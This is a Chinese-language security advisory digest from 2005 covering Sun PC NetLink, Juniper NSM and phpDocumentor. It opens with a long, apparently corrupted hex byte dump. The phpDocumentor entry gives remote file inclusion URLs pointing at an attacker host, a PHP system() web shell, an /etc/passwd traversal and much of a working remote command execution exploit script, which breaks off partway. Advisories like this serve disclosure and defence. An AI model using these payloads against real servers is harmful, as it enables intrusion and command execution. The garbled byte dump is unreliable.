\"x00x08x00x05x00x07x00x0bx00x0ax00x07x00x0cxd4x08\".\n \"x00x06x00x0bx00x0bx00x0cx00x0bx00x0bx00x05x00x0f\".\n \"x00x05x00x04x00x00x00x2ex01x01x00x04x00x00x00x02\".\n \"x01x02x00x05x00x00x00x09x02xffxffxffx02x05x00x00\".\n \"x00x14x02x00x00x00x00x04x00x00x00x2ex01x18x00x04\".\n \"x00x00x00x02x01x01x00x2ex00x00x00x32x0ax8fx00xd2\".\n \"x01x17x00x00x00x65x65x65x65x65x65x65x65x65x65x65\".\n \"x65x65x65x65x65x65x65x65x65x65x65x65x65x65x20x0f\".\n \"x00x10x00x0ex00x05x00x0cx00x06x00x0bx00x0bx00x08\".\n \"x00x0bx00x0ax00x05x00x0bx00x08x00x0bx00x0fx00x08\".\n \"x00x0cx00x05x00x07x00x0bx00x0ax00x07x00x0bx00x09\".\n \"x00x05x00x04x00x00x00x2ex01x01x00x04x00x00x00x02\".\n \"x01x02x00x05x00x00x00x09x02xffxffxffx02x05x82x00\".\n \"x00x14x02x00xf4x00x00x04x00x00x00x2ex01x18x00x04\".\n \"x00x00x00x02x01x01x00x0ax00x00x00x32x0axa8x00xd2\".\n \"x01x02x00x00x00x50x49x0ex00x07x00x04x00x00x00x2e\".\n \"x01x01x00x04x00x00x00x02x01x02x00x05x00x00x00x09\".\n \"x02xffxffxffx02x05xe5x00x00x14x02x00x00x00x00x04\".\n \"x00x00x00x2ex01x18x00x04xf3x00x00x02x01x01x00x35\".\n \"x00x00x00x32x0axa8x00xe7x01x01x00x00x00x2dx00x07\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x02\".\n \"x00x05x00x00x00x09x02xffxffxffx02x1dx00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x00x00\".\n \"x00x02x01x01x00x09x00x00x00x32x0axa8x00xeex01x01\".\n \"x00x00x00x33x00x0bx00x04x00x00x00x2ex01x01x00x04\".\n \"x00x00x00x02x01x02x00x05x00x00x00x09x02xffxffxff\".\n \"x02x05x43x00x00x14x02x00x00x00x00x04x00x00x00x2e\".\n \"x01x18x00x04x00x00x00x02x01x01x00x10x00x00x00x32\".\n \"x0axa8x00xfex01x06x00x00x00x65x65x65x65x65x65x0c\".\n \"x00x06x00x0bx00x0bx00x08x00x0ax00x04x00x00x00x2e\".\n \"x01x01x00x04x00x00x00x02x01x02x00x05x00x00x00x09\".\n \"x02xffxffxffx02x05x00x00x00x14x02x00x00x00x00x04\".\n \"x00x00x00x2ex01x18x00x04x00x00x00x02x01x01x00x09\".\n \"x00x00x00x32x0axa8x00x3dx02x01x00x00x00x3dx00x0c\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x02\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x00x00\".\n \"x00x02x01x01x00x25x00x00x00x32x0axa8x00x4fx02x14\".\n \"x00x00x00x65x65x65x65x65x65x65x65x65x65x65x65x65\".\n \"x65x65x65x65x65x65x65x0cx00x0bx00x0bx00x09x00x0c\".\n \"x00x0bx00x0bx00x08x00x05x00x0cx00x0bxb9x06x00x06\".\n \"x00x0bx00x0bx00x09x00x05x00x07x00x0cx00x05x00x04\".\n \"x4bx00x00x2ex01x01x00x04x00x00x00x02x01x02x00x05\".\n \"x00x00x00x09x02xffxffxffx38x05x00x00x00x14x02x00\".\n \"x00x00x00x04x00x00x00x2ex01x18x00x04x00x00x00x02\".\n \"x01x01x00x09x00x00x00x32x0axa8x00x08x03x01x00x00\".\n \"x00x7ex00x07x00x04x00x00x00x2ex01x01x00x04x00x00\".\n \"x00x02x01x02x00x05x00x00x00x09x02xffxffxffx02x05\".\n \"x00x00x00x14x02x00x00x00x00x04x00x00x00x2ex01x18\".\n \"x00x04x00x00x00x02x01x01x00x09x00x00x00x32x0axa8\".\n \"x00x0fx03x01x00x00x00x33x00x0bx00x04x00x00x00x2e\".\n \"x01x01x00x04x00x00x00x02x01x02x00x05x00x00x00x09\".\n \"x02xffxffxffx9ex05x00x00x00x14x02x00x00x00x00x04\".\n \"x00x00x00x2ex01x18x00x04x00x00x00x02x01x01x00x10\".\n \"x00x00x00x32x0axa8x00x20x03x06x00x00x00x65x65x65\".\n \"x65x65xfax0cx00x06x00x0bx00x0bx00x08x00x0ax00x04\".\n \"x00x00x00x2ex01x01x00x04x00x00x00x02x01x02x00x05\".\n \"x00x00x00x09x02xffxffxffx02x05x00x00x00x14x02x00\".\n \"x00x00x00x04x00x00x00x2ex01x18x00x04x00x00x00x02\".\n \"x01x01x00x22x00x00x00x32x0axc2x00xd2x01x12x00x00\".\n \"x00x50x4bx42x2cx20x65x65x65x20x3dx20x65x65x65x65\".\n \"x65x65x65x0ex00x10x00x0fx00x05x00x04x00x0ex00x11\".\n \"x00x0fx00x05x00x0cx00x05x00x0cx00x08x00x0bx00x93\".\n \"x00x0bx00x06x00x0bx00x04x00x00x00x2ex01x01x00x04\".\n \"x00x00x00x02x01x02x00x05x00x00x00x09x02xffxffxff\".\n \"x02x05x00x00x00x14x02x00x00x00x00x04x00x00x00x2e\".\n \"x01x18x00x04x00x00x00x02x01x01x00x10x00x00x00x32\".\n \"x0axc2x00x94x02x06x00x00x00x65x65x65x65x65x65x0c\".\n \"x00x06x00x0bx00x0bx00x08x00x0ax00x04x00x00x00x2e\".\n \"x01x01x00x04x00x00x00x02x01x02x00x05x00x00x00xd2\".\n \"x02xffxffx2fx02x05x00x00x00x14x02x00x00x00x00x04\".\n \"x00x00x00x2ex01x18xcex04x00x00x00x02x01x01x00x13\".\n \"x00x00x00x32x0axc2x00xd3x02x08x00x00x00x65x65x65\".\n \"x65x65x20x43x20x0fx00x05x00x0bx00x0bx00x0cx00x05\".\n \"x00x0fx00x05x00x04x00x00x00x2ex01x01x00x04x00x00\".\n \"x00x02x01x02x00x05x00x00x00x09x02xffxffxffx02x05\".\n \"x00x00x00x14x02x00x00x00x00x04x00x00x00x2ex01x18\".\n \"x00x04x00x00x00x02x01x01x00x18x00x00x00x32x0axdc\".\n \"x00xd2x01x0bx00x00x21x65x65x65x65x65x20x3dx20x65\".\n \"x65x65x00x0fx00x10x00x07x00x10x00x0fx00x05x00x0c\".\n \"x00x06x00x10x00x07x00x0ex00x04x00x00x00x2ex01x01\".\n \"x00x04x00x00x00x02x01x02x00x05x00x00x00x60x02xff\".\n \"xffxffx02x05x00x00x00x14x02x00x00x00x00x04x00x00\".\n \"x00x2ex01x18x00x04x00x00x00x02x01x01x00x09x00x00\".\n \"x8fx32x0axdcxd3x53x02x01x00x00x9exb9x00x07x00x04\".\n \"x00x00x00x2ex01x01x00x04x00x00x00x02xdax02x00x05\".\n \"x00x00x00x09x02xffxffxffx02x05x00x00x00x14x02x00\".\n \"x00x00x00x04x00x00x00x2ex01x18x00x04x00x00x00x02\".\n \"x01x01x00x1cx00x00x00x32x0axc6x00x5ax02x0ex00x00\".\n \"x00x65x65x65x65x65x65x65x65x65x65x20x49x44x48x0b\".\n \"x00x08x00x08x00x0bx00x0ax00x05x00x0bx00x07x00x0a\".\n \"x00x0bx00x06x00x08x00x10x00x10x00x04x00x00x00x2e\".\n \"x01x01x00x04x00x00x00x02x01x02x00x05x00x00x00x09\".\n \"x02xffxffxffx02x05x00x00x00x14x02x00x00x00x00x04\".\n \"x00x00x00x2ex01x18x00x04x00x00x00x83x01x01x00x09\".\n \"x00x00x00x32x0axdcx00xe4x02x01x00x00x00x2dx00x07\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x02\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x00x00\".\n \"x9bx02x01x01x00x0ax00x00x00x32x0axdcx00xebx02x02\".\n \"x00x00x00x31x2fx0bx00x06x00x04x00x00x00x2ex01x01\".\n \"x00x04x00x00x00x02x01x02x00x05x00x00x00x09x02xff\".\n \"xffxffx02x05x00x00x00x14x02x00x71x00x00x04x00x00\".\n \"x00x2ex01x5dx00x04x00x00x00x02x01x01x00x0cx00x00\".\n \"x00x32x0axdcx00xfcx02x03x00x00x00x43x65x64x00x0f\".\n \"x00x0ax00x0bx00x04x00x00x00x2ex01x01x00x28x00x00\".\n \"x00x02x01x02x00x05x00x00x00x09x02xffxffxffx02x05\".\n \"x00x00x00x14x02x00x00x00x00x04x00x00x00x2ex01x18\".\n \"x00x04x00x00x00x02x01x01x00x09x00x00x00x32x0axdc\".\n \"x00x20x03x01x00x00x00x2dx00x07x00x04x00x00x00x2e\".\n \"x01x01x00x04x00x00x00x02x01x02x00x05x00x00x00x09\".\n \"x02xffxffxffx02x05x00x00x00x14x02x00x00x00x00x04\".\n \"x00x00x00x2ex01x18x00x04x00x00x00x02x01x01x00x09\".\n \"x00x00x00x32xd0xdcx00x27x03x01x00x00x00x33x00x0b\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x02\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x00x00\".\n \"x00x02x01x01x00x09x00x00x00x32x0axdcx00x32x03x01\".\n \"x00x00x00x2dx00x67x00x04x00x00x00x2ex01x01x00x04\".\n \"x00x00x00x02x01x02x00x05x00x00x00x09x02xffxffxff\".\n \"x02x05x00x00x00x14x02x00x00x00x00x04x00x00x00x2e\".\n \"x01x18x00x04x00x00x00x02x01x01x00x37x00x00x00x32\".\n \"x0axf5x00xd2x01x20x00x00x00x65x65x65x65x65x65x65\".\n \"x65x65x65x65x65x65x65x65x65x65x65x65x65x65x65x6e\".\n \"x20x65x1ex65x65x65x65x65x20x0bx00x0bx00x11x00x0c\".\n \"x00x05x00x0bx00x0bx00x0bx00x0bx00x08x00x06x00x0b\".\n \"x00x0ax00x0bx00x07x00x79x00x06x00x0bx00x0bx00x11\".\n \"x00x0cx00x06x00x0bx00x06x00x0cx00x08x00x0bx00x07\".\n \"x00x0bx00x05x00x0cx00x05x00x04x00x00x00x2ex01x01\".\n \"x00x04x00x00x00x02x01x02x00x05x00x00x00x09x02xff\".\n \"xffxffx02x05x00x00x00x14x02x00x00x00x00x04x00x00\".\n \"x00x2ex01x18x00x04x00x00x00x02x01x01x00x10x00x00\".\n \"x00x32x0ax11x01xd2x01x06x00x00x00x52x49x50x20x3d\".\n \"x20x10x00x07x00x0ex00x05x00x0cx00x05x00x04x00x00\".\n \"x00x2ex01x01x00x04x00x00x00x02x01x02x00x15x00x00\".\n \"x00xfbx02xe8xffx00x00x00x00x00x00xbcx02x00x00x00\".\n \"x00x00x40x00x00x54x69x6dx65x73x20x4ex65x77x20x52\".\n \"x6fx6dx61x6ex00x00x11x04x00x00x00x2dx01xa7x00x04\".\n \"x00x00x00xf0x01x03x00x05x00x00x00x8dx02xffxffxff\".\n \"x02x05x00x00x00x14x02x00x00x00x00x04x00x00x00x2e\".\n \"x01x18x00x04x00x00x00x02x01x01x00x13x00x00x00x32\".\n \"x0ax11x01x0dx02x08x00x00x00x72x65x63x65x70x74x6f\".\n \"x72x0bx00x0bx00x0bx00x0bx00x0dx00x08x00x0cx00x0b\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x02\".\n \"x00x15x00x00x00xfbx02xebxffx00x00x00x00x00x00xbc\".\n \"x02x00x00x00x00x00x40x00x00x54x69x6dx65x73x20x4e\".\n \"x65x77x20x52x6fx6dx61x6ex00x00x11x04x00x00x00x2d\".\n \"x01x03x00x04x00x00x00xf0x01x05x00x05x00x00x00x09\".\n \"x02xffxffxffx02x05x00x00x00x14x02x00x00x00x00x04\".\n \"x00x00x00x2ex01x18x00x04x00x00x00x02x01x01x00x09\".\n \"x00x00x00x32x0ax11x01x65x02x01x00x00x00x2dx00x07\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x50\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x00x00\".\n \"x00x02x01x01x00x25x00x00x00x32x0ax11x01x6cx02x14\".\n \"x00x00x00x65x65x65x65x65x65x65x65x65x65x65x65x65\".\n \"x65x65x65x65x65x65x20x05x00x0bx00x07x00x0bx00x08\".\n \"x00x0bx00x0ax00x08x00x05x00x0bx00x0bx00x06x00x0c\".\n \"x00x08x00x0cx00x07x41x0ax00x06x00x0bx00x05x00x04\".\n \"x00x00x00x2ex01x01x00x04x00x00x00x02x01x02x00x05\".\n \"x00x00x00x09x02xffxffxffx02x05x00x00x00x14x02x00\".\n \"x00x00x00x04x00x00x00x2ex01xd5x00x04x00x00x00x02\".\n \"x01x01x00x1bx00x00x00x32x0ax2cx01xd2x01x0dx00x00\".\n \"x00x53x41x50x4bx20x3dx20x65x65x65x65x65x65x00x0c\".\n \"x00x0fx00x0ex00x11xb0x05x00x0cx00x05x00x08x00x08\".\n \"x00x08x00x0ax00x08x00x08x00x04x00x00x00x2ex01x01\".\n \"x00x04x00x00x00x02x01x02x00x05x00x00x00x09x02xd0\".\n \"xffxffx02x05x00x9dx00x14x02x00x00x00x00x04x00x00\".\n \"x00x2ex01x18x00x04x00x00x00x2bx01x01x00x09x00x00\".\n \"x00x32x0ax47x01x54x02x01x00x00x00x2dx00x07x00x04\".\n \"x00x00x00x2ex01x01x00x04x00x00x00x02x01x02x00x05\".\n \"x00x00x00x09x02xffxffxffx02x05x00x00x00x14x02x00\".\n \"x00x00x00x04x00x00x00x2ex01x18x00x04x00x00x00x02\".\n \"x01x01x00x21x00x00x00x32x0ax2cx01x5bx02x11x00x00\".\n \"x00x65x65x65x65x65x65x65x65x65x65x65x65x65x65x65\".\n \"x65x65x00x0bx00x0ax00x07x00x05x00x0bx00x0bx00x07\".\n \"x00x0ax84x0bx00x06x00x0cx00x08x00x0cx00x07x00x0a\".\n \"x00x06x00x0bx00x04x00x00x00x2ex01x01x00x04x00x00\".\n \"x00x02x01x02x00x4dx00x00x00x09x02xffxffxffx02x05\".\n \"x36x00x00x14x02x00x00x00x00x04x00x00x00x2ex01x18\".\n \"x00x04x00x00x00x02x01x01x00x10x00x00x00x32x0ax2c\".\n \"x01xfcx02x06x00x00x00x65x65x65x65x65x65x0cx00x06\".\n \"x00x0bx00x0bx00x08x00x0ax00x04x00x00x00x2ex01x01\".\n \"x00x04x00x00x00x02x01x02x00x05x00x00x00x09x02xff\".\n \"xffxffx02x05x00x00x00x14x02x00x00x00x00x04x00x00\".\n \"x00x2ex01x18x00x04x00x00x00x02x01x01x00x1cx00x00\".\n \"x00x32x0ax45x01xd2x01x0ex00x00x00x65x65x65x9ex3d\".\n \"x20x65x65x65x65x65x65x65x65x0cx00x0ex00x11x00x05\".\n \"x00x0cx00x05x00x0cx00x0fx00x0ex00x11x00x06x00x0e\".\n \"x00x0fx00x11x00x04x00x00x00x2ex01x01x00x04x00x00\".\n \"x00x02x01x02x00x05x00x00x00x09x02xffxffxffx02x05\".\n \"x00x00x00x14x02x00x00x00x00x04x00x00x00x2ex01x18\".\n \"x00x04x00x00x00x02x01x01x00x12x00x00x00x32x0ax45\".\n \"x01x86x02x07x00x00x00x6bx69x6ex61x73x65x20x00x0c\".\n \"x00x05x00x0bx00x0bx00x08x00x0ax00x05x00x04x00x00\".\n \"x00x2ex01x01x00x04x00x00x00x02x01x02x00x05x00x00\".\n \"x00x09x02xffxffxffx02x05x00x00x00x14x2ex00x00x00\".\n \"x00x04x00x00x00x2ex01x18x00x04x00x00x00x02x01x01\".\n \"x00x0cx00x00x00x32x0ax5fx01xd2x01x03x00x00x00x54\".\n \"x64x54x00x0ex00x0cx00x0dx00x04x00x00x00x2ex01x01\".\n \"x00x04x00x00x00x02x01x02x00x05x00x00x00x09x02xff\".\n \"xffxffx02x05x00x00x00x14x02x00x00x00x00x04x00x00\".\n \"x00x2ex01x18x00x04x00x00x00x02x01x01x00x16x00x00\".\n \"x00x32x0ax5fx01xffx01x0ax00x00x00x3dx20x74x65x72\".\n \"x6dx69x6ex61x6cx0cx00x05x00x07x00x0bx00x09x00x12\".\n \"x00x06x00x0bx00x0bx00x06x00x43x00x00x00x2ex01x01\".\n \"x00x04x00x00x00x02x01x02x00x05x00x00x00x09x02xff\".\n \"xffxffx02x05x00x00x00x14x02x00x00x00x00x04x00x00\".\n \"x00x2ex01x18x00x04x80x00x00x02x01x01x00x30x00x00\".\n \"x00x32x0ax5fx01x65x02x1bx00x00x00x65x65x65x65x65\".\n \"x65x65x65x65x65x65x65x65x65x65x65x65x65x65x65x65\".\n \"x65x65x65x65x65x65x00x0bx00x0ax00x0bx00x0ax00x0b\".\n \"x00x0cx00x0bx00x0ax00x05x00x0ax00x0bx00x08x00x05\".\n \"xabx0cx00x0bx00x05x00x08x00x08x00x0cx00x9ex00x08\".\n \"x00x07x00x0bx00x08x00x0bx00x08x00x0ax00x04x00x00\".\n \"x00x2ex01x01x00x04x00x00x00x02x01x02x00x05x00x00\".\n \"x00x09x02xffxffxffx02x05x00x00x00x14x02x00x00x00\".\n \"x00x04x00x00x00x2ex01x18x00x04x00x00x00x02x01x01\".\n \"x00x0fx00x00x00x32x0ax79x01xd2x01x05x00x00x00x54\".\n \"x4ex46x20x3dx00x0dx00x0fx00x0ex00x05x00x0cx00x04\".\n \"x00x00x00x2ex01x01x00x04x00x00x00x02x01x02x00x05\".\n \"x00x00x00x09x02xffxffxffx02x05x00x00x00x14x02x00\".\n \"x00x00x00x04x00x00x00x2ex01x18x00x04x00x00x00x02\".\n \"x01x01x00x0fx00x00x00x32x0ax79x01x12x02x05x00x00\".\n \"x00x65x65x65x65x65x00x08x00x0cx00x11x00x0cx00x09\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x02\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x00x00\".\n \"x00x02x01x01x00x1fx00x75x00x32x0ax79x01x51x02x10\".\n \"x00x00x00x65x65x65x65x65x65x65x65x65x65x65x65x65\".\n \"x65x65x20x0bx00x0ax00x0bx00x08x00x0bx00x09x00x05\".\n \"x00x09x00x05x00x07x00x0bx00x0ax00x07x00x0bx00x09\".\n \"x00x05x00x04x00x00x00x2ex01x01x00x04x00x00x00x02\".\n \"x01x02x00x05x00x00x00\n\n建议:\n--------------------------------------------------------------------------------\n厂商补丁:\n\nMicrosoft\n---------\n目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:\n\nhttp://www.microsoft.com/technet/security/\n\n\n\n\n\n\n\n\n\n\nSun Solaris PC NetLink不安全权限漏洞\n发布日期:2005-12-26\n更新日期:2005-12-26\n\n受影响系统:\nSun PC NetLink 2.0\n描述:\n--------------------------------------------------------------------------------\nBUGTRAQ ID: 16059\n\nSun PC NetLink是为SUN服务器提供Microsoft Windows应用程序服务的系统。\n\nPC NetLink 2.0的两个脚本文件以不安全的方式打开文件,本地攻击者可能利用漏洞提升自己的权限。\n\nPC NetLink 2.0的“/etc/init.d/slsadmin”脚本和“/opt/lanman/sbin/slsmgr”命令中的安全漏洞可能允许不安全的打开文件,这可能允许本地非特权用户能够以运行slsadmin或slsmgr用户的权限写入文件系统。如果slsadmin或slsmgr以root权限运行的话,就可能允许本地非特权用户在系统上获得提升的权限并运行任意命令。\n\n<*来源:Sun Alert Notification\n \n 链接:http://sunsolve.sun.com/search/p ... etkey=1-26-102117-1\n http://sunsolve.sun.com/search/p ... etkey=1-26-102122-1\n*>\n\n建议:\n--------------------------------------------------------------------------------\n厂商补丁:\n\nSun\n---\nSun已经为此发布了个安全公告(Sun-Alert-102117和Sun-Alert-102122 )以及相应补丁:\n\n补丁下载:\nhttp://sunsolve.sun.com/search/d ... id:1-21-121332-01-1\nhttp://sunsolve.sun.com/search/d ... id:1-21-121209-01-1\n\n\n\n\n\n\n\n\n\n\n\nJuniper NetScreen-Security Manager远程拒绝服务漏洞\n发布日期:2005-12-28\n更新日期:2005-12-28\n\n受影响系统:\nJuniper Networks NSM 2004 FP3\nJuniper Networks NSM 2004 FP2\n描述:\n--------------------------------------------------------------------------------\nBUGTRAQ ID: 16075\n\nNetScreen-Security Manager(NSM)是一款安全管理平台,提供对设备、网络以及安全配置和策略的管理和监控。\n\nJuniper NSM中存在远程拒绝服务漏洞,远程攻击者可能触发服务器崩溃或挂起,造成对合法用户的拒绝服务。请注意NSM中捆绑了watchdog服务,可定期重启服务。\n\n<*来源:David Maciejak (david.maciejak@kyxar.fr)\n *>\n\n建议:\n--------------------------------------------------------------------------------\n厂商补丁:\n\nJuniper Networks\n----------------\n目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:\n\nhttp://www.juniper.net/customers/support/products/nsm.jsp\n\n\n\n\n\n\n\n\n\n\n\nPHPDocumentor远程和本地文件包含漏洞\n发布日期:2005-12-29\n更新日期:2005-12-29\n\n受影响系统:\nPhpDocumentor PhpDocumentor <= 1.3.0 rc4\n描述:\n--------------------------------------------------------------------------------\nBUGTRAQ ID: 16080\n\nphpDocumentor(有时也被称为phpdoc或phpdocu)是PHP语言的标准自动化文档工具。\n\nphpDocumentor中存在本地和远程文件包含漏洞:\n\ni) 在Documentation/tests/bug-559668.php的第4行:\n\n...\nrequire_once $FORUM[/LIB/] . //classes/db/PearDb.php/;\n...\n\n如果打开了register_globals和allow_url_fopen的话,则\n\nhttp://[target]/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?cmd=ls%20-la&FORUM[LIB]=http://[attacker]\n\n在http://[attacker]/classes/db/PearDb.php/index.html 可得到以下代码:\n\n<?php system($cmd);?>\n\n此外,如果关闭了magic_quotes_gpc的话:\n\nhttp://[target]/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?FORUM[LIB]= \nhttp://[attacker]/script.txt%00 \nhttp://[target]/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?FORUM[LIB]=../../../../../../../etc/passwd%00\n\nii) 在docbuilder/file_dialog.php的49-56行:\n\n...\n /**\n * common file information\n */\n include_once(\"$root_dir/phpDocumentor/common.inc.php\" ; [!]\n include_once(\"$root_dir/HTML_TreeMenu-1.1.2/TreeMenu.php\" ; [!]\n include_once(\"$root_dir/docbuilder/includes/utilities.php\" ); [!]\n\n $root_dir = dirname(dirname(__FILE__)); [!!!!!!!!]\n...\n\nhttp://[target]/[path_to_phpdocumentor]/docbuilder/file_dialog.php?cmd=ls%20-la&root_dir=http://[attacker]\n\n在http://[attacker]/phpDocumentor/common.inc.php/index.html 可得到同样的代码。\n\n远程攻击者可以利用这些漏洞在用户系统上执行任意服务端代码。\n\n<*来源:rgod (rgod@autistici.org)\n \n 链接:http://marc.theaimsgroup.com/?l= ... 87730223824&w=2\n*>\n\n测试方法:\n--------------------------------------------------------------------------------\n\n警 告\n\n以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!\n\n<?php\n# ---phpdocu_130rc4_incl_xpl.php 13.06 29/12/2005 #\n# #\n# PhpDocumentor <= 1.3.0 rc4 remote commands execution #\n# coded by rgod #\n# site: http://rgod.altervista.org #\n# #\n# usage: launch from Apache, fill in requested fields, then go! #\n# #\n# Sun-Tzu: \"Confront your soldiers with the deed itself; never let them know #\n# your design. When the outlook is bright, bring it before their eyes; but #\n# tell them nothing when the situation is gloomy.\" #\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\", 5);\nob_implicit_flush (1);\n\necho/<html><head><title>**PhpDocumentor <= 1.3.0 rc4 remote commands execution**\n</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">\n<style type=\"text/css\"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:\n#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img\n{background-color: #FFFFFF !important} input {background-color: #303030\n!important} option { background-color: #303030 !important} textarea\n{background-color: #303030 !important} input {color: #1CB081 !important} option\n{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox\n{background-color: #303030 !important} select {font-weight: normal; color:\n#1CB081; background-color: #303030;} body {font-size: 8pt !important;\nbackground-color: #111111; body * {font-size: 8pt !important} h1 {font-size:\n0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em\n!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em\n!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em\n!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:\nnormal !important} *{text-decoration: none !important} a:link,a:active,a:visited\n{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;\ncolor : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;\nfont-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\nfont-weight:bold; font-style: italic;}--></style></head><body><p class=\"Stile6\">\n**PhpDocumentor <= 1.3.0 rc4 remote commands execution**</p><p class=\"Stile6\">a\nscript by rgod at <a href=\"http://rgod.altervista.org\"target=\"_blank\">\nhttp://rgod.altervista.org</a></p><table width=\"84%\"><tr><td width=\"43%\"> <form\nname=\"form1\" method=\"post\" action=\"/.$SERVER[PHP_SELF]./\"> <p><input\ntype=\"text\" name=\"host\"> <span class=\"Stile5\">* hostname (ex:www.sitename.com)\n</span></p> <p><input type=\"text\" name=\"path\"> <span class=\"Stile5\">* path (ex:\n/phpdocumentor/ or just / ) </span></p><p><input type=\"text\" name=\"CMD\"> <span\nclass=\"Stile5\"> * specify a command </span></p> <p> <input type=\"text\"\nname=\"LOCATION\"><span class=\"Stile5\">* remote location ( ex: http://www.somesite\n.com, without traling slashes)</span></p><p><input type=\"text\" name=\"port\"><span\nclass=\"Stile5\">specify a port other than 80 (default value)</span> </p> <p>\n<input type=\"text\" name=\"proxy\"><span class=\"Stile5\">send exploit through an\nHTTP proxy (ip:port)</span> </p> <p> <input type=\"submit\" name=\"Submit\"\nvalue=\"go!\"></p></form></td></tr></table></body></html>/;\n\nfunction show($headeri)\n{\n $ii=0;$ji=0;$ki=0;$ci=0;\n echo /<table border=\"0\"><tr>/;\n while ($ii <= strlen($headeri)-1){\n $datai=dechex(ord($headeri[$ii]));\n if ($ji==16) {\n $ji=0;\n $ci++;\n echo \"<td> </td>\";\n for ($li=0; $li<=15; $li++) {\n echo \"<td>\".$headeri[$li+$ki].\"</td>\";\n }\n $ki=$ki+16;\n echo \"</tr><tr>\";\n }\n if (strlen($datai)==1) {\n echo \"<td>0\".$datai.\"</td>\";\n }\n else {\n echo \"<td>\".$datai.\"</td> \";\n }\n $ii++;$ji++;\n }\n for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {\n echo \"<td>  </td>\";\n }\n for ($li=$ci*16; $li<=strlen($headeri); $li++) {\n echo \"<td>\".$headeri[$li].\"</td>\";\n }\n echo \"</tr></table>\";\n}\n\n$proxy_regex = /(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})/;\n\nfunction sendpacket() //2x speed\n{\n global $proxy, $host, $port, $packet, $html, $proxy_regex;\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n if ($socket < 0) {\n echo \"socket_create() failed: reason: \" . socket_strerror($socket) . \"<br>\";\n }\n else {\n $c = preg_match($proxy_regex,$proxy);\n if (!$c) {echo /Not a valid prozy.../;\n die;\n }\n echo \"OK.<br>\";\n echo \"Attempting to connect to \".$host.\" on port \".$port.\"...<br>\";\n if ($proxy==//) {\n $result = socket_connect($socket, $host, $port);\n }\n else {\n $parts =explode(/:/,$proxy);\n echo /Connecting to /.$parts[0]./:/.$parts[1]./ proxy...<br>/;\n $result = socket_connect($socket, $parts[0],$parts[1]);\n }\n if ($result < 0) {\n echo \"socket_connect() failed.\r\nReason: (\".$result.\" \" . \nsocket_strerror($result) . \"<br><br>\"; }\n else {\n echo \"OK.<br><br>\";\n $html= //;\n socket_write($socket, $packet, strlen($packet));\n echo \"Reading response:<br>\";\n while ($out= socket_read($socket, 204 ) {$html.=$out;}\n echo nl2br(htmlentities($html));\n echo \"Closing socket...\";\n socket_close($socket);\n }\n }\n}\n\nfunction sendpacketii($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy==//) {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo /No response from /.htmlentities($host); die;\n }\n }\n else {\n $c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo /Not a valid prozy.../;die;\n }\n $parts=explode(/:/,$proxy);\n echo /Connecting to /.$parts[0]./:/.$parts[1]./ proxy...<br>/;\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo /No response from proxy.../;die;\n }\n }\n fputs($ock,$packet);\n if ($proxy==//) {\n $html=//;\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html=//;\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) \n{ $html.=fread($ock,1);\n }\n }\n fclose($ock);echo nl2br(htmlentities($html));\n}\n\n$host=$_POST[host];$path=$_POST[path];\n$port=$_POST[port]; $CMD=$_POST[CMD];\n$LOCATION=$_POST[LOCATION];\n\n\nif (($host<>//) and ($path<>//) and ($CMD<>//) and ($LOCATION<>//))\n{\n $port=intval(trim($port));\n if ($port==//) {$port=80;}\n if (($path[0]<>///) or ($path[strlen($path)-1]<>///)) {die(/Error... check the \npath!/);} if ($proxy==//) {$p=$path;} else {$p=/http:///.$host./:/.$port.$path;}\n $host=str_replace(\"\r\n\",\"\",$host);\n 